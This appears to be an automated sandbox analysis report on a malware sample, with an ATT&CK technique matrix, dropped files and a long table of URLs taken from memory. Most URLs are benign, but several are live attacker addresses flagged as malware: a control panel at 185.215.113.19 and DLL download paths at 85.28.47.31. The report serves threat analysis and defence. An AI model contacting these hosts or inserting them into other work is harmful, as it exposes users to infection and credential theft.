Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	111 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Install Root Certificate	NTDS	458 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	111 Registry Run Keys / Startup Folder	23 Software Packing	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	891 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	571 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	14 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	571 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	112 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\1000003002\ead6a72944.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\447331\Buyer.pif	0%	ReversingLabs

Source	Detection	Scanner	Label
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23ResponseD	0%	URL Reputation	safe
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	0%	URL Reputation	safe
https://merino.services.mozilla.com/api/v1/suggest	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	URL Reputation	safe
https://spocs.getpocket.com/spocs	0%	URL Reputation	safe
https://screenshots.firefox.com	0%	URL Reputation	safe
https://ads.stickyadstv.com/firefox-etp	0%	URL Reputation	safe
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	URL Reputation	safe
https://www.amazon.com/exec/obidos/external-search/	0%	URL Reputation	safe
https://profiler.firefox.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	URL Reputation	safe
https://tracking-protection-issues.herokuapp.com/new	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	0%	URL Reputation	safe
http://exslt.org/common	0%	URL Reputation	safe
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	URL Reputation	safe
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	0%	URL Reputation	safe
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
https://bugzilla.mo	0%	URL Reputation	safe
https://mitmdetection.services.mozilla.com/	0%	URL Reputation	safe
https://static.adsafeprotected.com/firefox-etp-js	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10ResponseD	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	0%	URL Reputation	safe
https://spocs.getpocket.com/	0%	URL Reputation	safe
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	0%	URL Reputation	safe
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	0%	URL Reputation	safe
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15ResponseD	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
https://monitor.firefox.com/user/breach-stats?includeResolved=true	0%	URL Reputation	safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	0%	URL Reputation	safe
https://monitor.firefox.com/about	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13Response	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	0%	URL Reputation	safe
https://contile.services.mozilla.com/v1/tiles	0%	URL Reputation	safe
https://monitor.firefox.com/user/preferences	0%	URL Reputation	safe
https://screenshots.firefox.com/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id4ResponseD	0%	URL Reputation	safe
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22ResponseD	0%	URL Reputation	safe
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16ResponseD	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19ResponseD	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/sc	0%	URL Reputation	safe
https://github.com/mozilla-services/screenshots	0%	Avira URL Cloud	safe
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	malware
https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records	0%	Avira URL Cloud	safe
https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsor	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	0%	Avira URL Cloud	safe
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	0%	Avira URL Cloud	safe
http://85.28.47.31/8405906461a5200c/softokn3.dll	100%	Avira URL Cloud	malware
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The	0%	Avira URL Cloud	safe
https://firefox.settings.services.mozilla.com/v1clearCache/this._cacheEntryPromise	0%	Avira URL Cloud	safe
http://85.28.47.31/8405906461a5200c/vcruntime140.dll	100%	Avira URL Cloud	malware
https://www.google.com/policies/privacy/resource://gre/modules/Log.sys.mjsipc:first-content-process-	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/X	0%	Avira URL Cloud	safe
https://www.youtube.com/accountC:	0%	Avira URL Cloud	safe
http://85.28.47.31/8405906461a5200c/vcruntime140.dll;	100%	Avira URL Cloud	malware
http://85.28.47.31/8405906461a5200c/nss3.dll	100%	Avira URL Cloud	malware
http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B	100%	Avira URL Cloud	malware
https://www.youtube.com/account--attempting-deelevationN	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://mail.yahoo.co.jp/compose/?To=%s	0%	Avira URL Cloud	safe
https://screenshots.firefox.comPage	0%	Avira URL Cloud	safe
https://firefox-source-docs.mozilla.org/remote/Security.html	0%	Avira URL Cloud	safe
http://85.28.47.31/8405906461a5200c/softokn3.dllk	100%	Avira URL Cloud	malware
http://85.28.47.31/5499d72b3a3e55be.phposition:	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	unknown
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	unknown
vaniloin.fun	104.21.72.79	true	false	unknown
ssl.bingadsedgeextension-prod-centralus.azurewebsites.net	52.153.155.231	true	false	unknown
googlehosted.l.googleusercontent.com	142.250.185.161	true	false	unknown
clients2.googleusercontent.com	unknown	unknown	true	unknown
bzib.nelreports.net	unknown	unknown	true	unknown
www.youtube-nocookie.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://85.28.47.31/8405906461a5200c/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.19/Vi9leo/index.php	true	Avira URL Cloud: malware	unknown
http://85.28.47.31/8405906461a5200c/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://85.28.47.31/8405906461a5200c/nss3.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://firefox.settings.services.mozilla.com/v1clearCache/this._cacheEntryPromise	firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id23ResponseD	buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records	firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDA72000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21Response	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://spocs.getpocket.com/spocs	firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://screenshots.firefox.com	firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsor	firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://profiler.firefox.com/	firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mozilla-services/screenshots	firefox.exe, 00000028.00000003.2783596675.0000026192200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/ip	buildred.exe, 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The	firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://exslt.org/common	firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/X	PharmaciesDetection.exe, 00000015.00000003.2676783589.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id24Response	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/policies/privacy/resource://gre/modules/Log.sys.mjsipc:first-content-process-	firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://85.28.47.31/8405906461a5200c/vcruntime140.dll;	file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bugzilla.mo	firefox.exe, 00000028.00000002.2925172791.0000026194847000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E3D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://mitmdetection.services.mozilla.com/	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com/accountC:	firefox.exe, 00000028.00000002.2878694022.0000026181C00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.adsafeprotected.com/firefox-etp-js	firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id10ResponseD	buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://spocs.getpocket.com/	firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5Response	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com/account--attempting-deelevationN	firefox.exe, 00000027.00000002.2761056031.0000025949DA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id10Response	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id8Response	buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://monitor.firefox.com/about	firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
